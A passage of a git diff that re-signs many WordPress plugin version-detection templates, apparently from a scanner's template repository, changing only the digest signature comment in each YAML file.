digest: 4a0a00473045022100fe98f7336c4a2e50ec5f24af163b6b35c51157b3faa58568b871f123cf6c13a9022072af8f0638da2f5b3d0d4dcc2bf149dc2016f19ff0a268549bfbccc29e6011f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 249a23f1d3..cbf7dd7673 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ccc4570a3867dc9a15fc3cd439188a8cd5e925623aac1e657dd9f096c646f0a502207374e4433517d4caa54b01e69bad111f1500810a010fb8c23380852bda5c3b25:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201e323d520f3156e52c67e6a53b53fe4c50e4c7466b3d638e1ecff6f09d91750202205ce94338a809b81bc1dc23ffb31ad268cfcd4dcef3fa65f00d313e428e073bd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 6a9175f674..240473cf46 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202c0d44a95130b47da84c19049a76f1c894504c5aa13b5ae6c4d8b2b4c3cb653d0220260822736e215a51be0733312b31978275a7178e4468007ad5a83178d0906a9e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e28e17fdc0906681dd0816c9d5fc5d803f73ca79303ec843fb1fd0d569bf4d16022072ca6e72a60b46cc290e144ef667b2c6436e1516d8895b14bf248410e0cee052:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 007ce74832..405a773560 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022005dc8d2b939c3e50c22177d4b58e8e292a6b075dd2c288f00ead7e3e835587380220173b71e8c394823699fa3249bb248b8580e285dc176d02bbf0b662ec96f30fba:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100813139b23ab19c417d951ac2963f8540a0c4f3ab5c9aaf372792cf017addca95022020d88845ceec5826bdd7ff84fc7fc5100c5da90fd7c2f4169b87c2185e96d281:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index a04128a04b..2682ae4d0b 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205923239d1b282ec36109c5607332d8577b680604b6eea5907b6b7e4e1f4a406b022100ba936802f9c9d4d1ebd04a5686e89be54913f4f30333267fb66389c060d5825c:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220791e5b035ba59794e83f60bfcd4d0903834e0b7d956bd26194228a6d35e3b89102205d60cf10d86c213083156393cc94d6426356d62b5b0a57898080e908a4e0172e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index e5c2f38c22..b0d3cfa2c4 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b3e7fc3a85f8c6641447a3cb8025d18d4ab9107f45e92aed1ef00e9dacc35e2c022100c3666f74b742c21f71ef4b63327f68d574374d48ef214d5939fddad3d45182b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100eb12afa18b0f5cd254b6a2ad0c470857130a5dc628f6229dfd9363f1e4965036022055f2a413add928040b1789f21006b70f30b24f45ddd01d9a96e243579a0fcb9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 769779579f..2eb2c5c4fa 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fa8f6251aebc907f4cbefad3634a81205017112a13c2e6f4227112ff3764cbe702205dd33391abc7c3e959d37fdfe5896c11ee6faac75cd1823926a2305e7cf4c3e7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dfe295aeab43c76866a9110aeb755e3c991e0a7786b576b3e4f67fe3aa6db6d1022010a88f1a1eb213d3555a8cc320c690ee38364c4ac232f45767f3977c1764d3b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index f05f43aab4..32c1e66954 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200eea834b1cfe14a4d8848eb27eb3bdca09b98f6d2cdf2212310d928a37b68aed022100ba59081f00ca79eec92ef126dcda731436a439774f31f6283270e7913867545c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022058f2531f7459b7018d72f6a512d71eb2d786defbf13b2b7f21a4f20fa3180d02022100f3db7ad5ad1dc4ae08402621b68db32b5c132ffecd1ba4cedb303d1ea9bad124:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index f6371f2105..4e51bf349f 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022073adcf633fe453e9e865e833d95b39cf6c3db15e72534dfb92814844cf5353c0022037ba9af8cbb90d63b0466af2369fedaa9a87a5eda6bc269ed68e6675074f8fec:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022065cdbcd7bc43d727495fc1ca80d858d8ec22dc0219e2fe56caffec259ce3df240221008ae7631e4bfc6e0a23bf6f3bf770204cb40bd7ccaad4b4d0ee9de29bb8c6c829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 6937122da8..97039e49fb 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a2b51ce254c76e027dc3cf8752d268e6f01081fdfbdd0b28f684f00deb25c678022073f07ed0e3eee2bf11b1107ebe2bdfff4c81d7bb825117c07fef7fa348e22e2c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022074c8eb6b15d4431db13c5fa59233b2291ee3d0bfcd9f74018a6cb3fa5d52c668022100efa7104b33edc376bfec8cfcf6ae48966c4ad2147041f86f4853b3f65a962111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 66a7bcc0c6..c3554ceca8 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022000c09151531632ce74eac0db54a7f17cd8c2cca3aeccb6b6aafb42aea36a7b1b02204af3991583a6612806566944dc6e9306d14876f59fb2f597f9b193e6d3b4f25e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207bea190feaa0eb06f0eb8d15e7465b5bf6a56b30c24a57e5b11d71df9cc59b2f022100de5750bc8c8ba83d13e89bb383927028216b682ae03cb42e899e228fab9f2551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index d10e11f9dd..fd0f8fc2d9 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100af29737bf52cc420e96a54e7889ae04184e8b06a0ce4784e1322a1d47bedf9fa022100b20bf65b4d3847466ea2a95de239158105ce75ba102c716b6d849f99403a9f56:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206a6133fca48dd90dfaf1230b6b1c617f3806544bc5bfbc61d8fa810d402539ba022100be93845d1c84fb9398273a95b336235ec327a0e4cac1e4ef539f5b84ce4dbf78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9ef093b78a..8c5fdb10df 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220177a2d7ee7de1d4c7d73aaa39a28e71ea3b0ff9e86fe9aaaf9cd4df13c2259c9022022f5bf9a0532e0976c88c1f82a7c758d84dca8a5c7fc3364b38a5ae71ddc3560:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e4b1296b068661dfcf945c2fb5ad5bf11084c9f13d97ecc58d3922354afa35e602202157c96217b37a8436c419123da584c7094dd7e3b77613cb7b1152ba5b762977:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 31dc7f5b41..0dbee9b3f8 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b9ad24529fb88e61c3c7786ea8e433acc711a7583a63773a8b164b65ae44fad8022100b3615ed36a90c653bf1dec0396d91b8aeeef35c9093ea884a06c66630640106f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009c100d7a6541fbd9d4f2ffad2cac2492875d8f9592cd8bf784e1ccd9816e2240022100f85db4d9b476a1ea329179dc1adcd6e3d9651ec7188e2bd2a761438f7082b2f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 62aa9c9b82..b5de8c24ca 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100abaf6be76d15b4e93d0476e197f60eb7fb484b53bd4a8dc0bd8242e71b10c2d002210085f87523cf63397e69707d470e2d16512ff18f42974a652fb44dae68c0cf1cf5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200cbe8e81fd83605696df4720169c4c4277d3af0eaf94532aed02434a974b20a6022100de4e7d7186a69daf567be731e7e242279763c84043542e655a5b8dd1b0aef546:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index f5b8bbe161..f940e73eba 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022075539f26b293aa5f673916f1c47510d4b9915eb6fa13a4780bd2af3185b557d2022009e48497d4a39bc5876b852685ab08661d0bc6d85c16c2ceff5c62239f9da1f1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200bd085326d120d14c1737f393a87cc02be9a5bd48cc4189cfc2982bb6386028c022100ae258f5cc6446db86d22ef6fb7c8ee9ee799a0b7956e45d2c632a5c5a463c377:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 0b7f0c4bf5..cdf4987b82 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200deee2bd5a21b875c938d8b1d234f728de21c335ff7ea43e5d052084ffb83083022053f43f9712527be692f64c2d5dbf49061707b8af543686a754ea879fe5f1cbf5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bb2e3e19fff87dda94061b73324117f667846312f23830d5938c54e3c2d64621022040f7d574711a51c2278941f5d3365c38be46413588aef71cbea9c59d3bbdff3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 0c8139736d..7c9795c551 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204796397351bcbd8981e563eae4aadd56d7730e6f2990c4a39741614ddd07382a022100d67ae285e03977652f1d355c488e98073e50b2c9844a53cb70eb79dc94a35a60:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207f470143a279a212ea32c3e59e47893a7bb788c682d2f98cc57424fd75e687a8022040e47b381f7cd1cbbab69a0755964eeed1c2b3bd34cebc5f0dce75fe6624c697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 98bf8b73ca..a6d0a985e0 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402204fb67f0f83a14b80563784fb7704bac46274427329ed08a4d1f2dcaac2438f9c02204203220776ee282f95c4ff280d5692d3b2c6f7631d65ce24fc434f6387fe68fd:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e902b5f8d400a7a15df8dacd1794d51c06648a451cf2c61b6bb8d7f79a2c3574022100bd31245e974a0ffe4cd41551ec1cb9051e5e3910204057d1e658439366e3cd84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index b1f4323c2e..5443086723 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b6d9fc01d9272370739bc006bd9c03dd1ff26124c36fe170400b5f8baa5f9d2502202eda7ddc1db689d867d2c8bc2a7d49da703be769fa01fcd66384b97581f2557a:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402201dc94e3d320d3980f67913eb9ceb7f66a0bcedf89a9766dc774764bd1e9e191b022058e9d8ae298f8ec5b297ea577efd78d45b1c4ad8effd8ad854ac584dccd7f1b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index abb534569b..f65ead3191 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022042080cbb6fc265136f8c870a3bdb9d645fa61fc21e7d83608bbaeb2d9a9cc5de02205096432ddda031b9d0ac2000784b81aa079c18967d1ebac737e546b284766419:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100951df43384d363ad88c9e53ab0c454117b9f68d23e04ec60c86b06242220ea510220104e3ad9f0c6dfc86fb44e12cbe508a3b8abfdff7a52854c4d2a0a80f201259b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index ff98467f81..a531dcbd04 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c04f2880c34eaef6f4053a1a35c859fe14acbc49dbc7b439b629803f8e9d227f02203574f2054b4dd9dbab6261d87788fc268207eb79937b9257314566ffa0a9be0a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220047d7bbefaded63aaf85bdc15a8ea57420b7fc1e8b094b242e0af2e6c4d910ef022100f5fd2f56e6aed36bc140d05dad547433710e7c780b3fddf5dea30af48060d4d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 6202d23c2a..1dd507cef0 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022054b28181ed5e4592bf72c0cb5bfc5a482ea13ec941b354573c377b06ebb92da8022100b0bfed3ceec0de538c3b11066ad3266b2e6921eff7755d14f29bfd8a0c0fc5d0:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022019be69053372f052fb01c38c10379898fd7cc5a101cab111b94325350945a8b302202e6d72de724fc93fd51d4a5229cc77b656f4c05fec13bc0c0665ae1638c21269:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 3bd6d147d9..85b155f8a4 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100c2780bddbb1e8349240c269f1b81f1aaf12aa6d484c67a645960a4c9a8f0490e022100dde3cb4ef9d76beb19f5819485ffd0aad6ef1ec718d9a5c7a54c90f90f9195c3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220565feb1b5348b17d5e2d1c19c32176dbebf9be52136c917ef1235081162b1d87022100dad57cb01cdd7320d3408c82b228259edc1c4c1866e00d1626aac900da8f061c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 7135f18565..4130edee3a 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022048332072632b496cde31e5696245caa6b599394455f8dcd12351488a8d19fc38022100b7fe5d9c125168844accffee4287f070b31ebf9d1e46cb02f57f7dbd35d180aa:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220629e8aaa3ede680089d8c674d1df3beeff15d9bbae2437141a577d31e9b92e8f022100e9804f7bedd38a344fc6424133a7a2a86a16b29cb839a0247ebb723a7e536d15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 907e92840d..5bf953a280 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502200bcd1c6581ec980a83878ce77a189c6b7ea12e35fa2fe2f5df01036863f2c567022100c8d092aad6d405307d98203afe356d849324b8ee99733e3aad63ddaa58dd6e3a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b56896376ab303a27bb91f9e42251b4ecdcd48d7b1751221180a31acf4bcf72d022036d84b2a4a2c1f92d074c319fff0120b63c9ddc2b53b1afa4c405b5e86a58480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 7d28a6d01a..80b1617d01 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220175b9ec94f5da1d83b7607152e299260dfc0cb370b4cad8f8ceb41130af59f4e022100bf96473c3eb518eef9c12efa47bdb562816d2181de1b2d6ea34c093d781d5ba1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a7b385f24563f7b829710f42796da4d339fc53400c6554ca1386340451e4f10502200929c5ce115574e938d5d7d95fcb2ad221a84ac91396b0e8229797e90b591292:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 31d6397d68..c58e574099 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c76af477a0a98f7cfc3d3d1024a9a7012793af9affc8818c4f4b099c907ef7f902201d5e6381d5f5328b3d24cca47af318333dacfce69798c9ed35b9d7c532e7058d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100fafddad95a8e4086537fff7c402f539ea49b9762e171701bcacac57aa835c5710220089a0d2a7c97972b8740196f5f4cae97554a80dd2909701f87a0d70d0345b530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 945c082d2e..b9ba0b3eaa 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202cd99a595a0495dde2f207b86a232b939e47ae71d6fafb1fbaafc8da279683160220203a0aa9a1acca9419a04d3d1ee4909f46be2b36e73eaa0ca1a0feac9969174b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207881873c97c0bbd0a090015aefaa59d7239f05c24ef6a694629d1572946acea40220471e759df0cc561eb6f79927fbf09caa2aa94fae199ce7ca2b380a5f5051a66f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 53b51b0849..8dcdd322e4 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009f1698a29285e443f983e5ce7bc2b5e5ebe213789b5914a4c49e08c56f27e76e02202fd8734a14c70965c94a10f5a76985585dd5fcfe9eecd7f0fe9e8ebd04025443:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f64640b154f00979218e3c57e3d9414e3455d4c7020bfdbbde7ed4600892693502206056eb841e091abc1c56bde24a9e4d3162ba3d0c553a6d07fffb60e82f3378a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index f77f080742..e15ea2befd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206badc48455365452aed55606fb2d68a8a132c5693cf885e9da86b0130357127d02201c3b1515611527150b62289c838559b0876f52c7eb89b60d604287700d17e68f:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220439d56811f729df5de8cbb1d3cc0f495ab816e6b9c563d87a12ecd5ffdffa7ad022100aa8b09f6523d01d8386a915a58d647cc477bdd18bef17835cfe65895fe6881d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 0dd9716df7..66c2fef299 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100846ed1b517c01b51011283959695c043000dab090ecd525b8728387c0f47313f022007fe71d70a6788faa11b33f95f9c8f5995f360e1b8003d99c0b7ffd9c7daf2c4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008ed7ff8228fc3c81ff7208214629d0ac3d1976d39d0c8efbb7970a841ec90e090220563a113fbb961397168160ab05150aafed47332d8f580ec66477c0cda0963748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index 6b150ac688..33d43bcec8 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022040d1da29b7f5496c3657510e32481a5dea9a4765301512672398e9d67e7e39060220104ba355c547e28b3d232454d0b177fb04d92cd8845ab0212e09953ff5256371:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c4841a7068c10a5ee570677c91acf30b452372cd836153508aa992f08839516c022100bfc2e90dc8c07d805a3858f28f270a2ea61e1d5ba95a3a27d97dc39b40697304:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index d6c1f338e4..672c34d91e 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201fc32e228d6965f1aba3151b6107eb54803b5e94bf0a87e960aaf9702de7d88d022100e726b7a5862d154abacaaa04c2755b5eb110dd8691702953b68dc894355e4039:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210081ff5f756492e261c9d0fd758be81c54be06689188eae195a901646086edffac0221008514915a85e4a73b76226f3de28b6cdb0f29f2fc7a5105e817f484576d67af7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 023d6ed012..1534c1016b 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -47,5 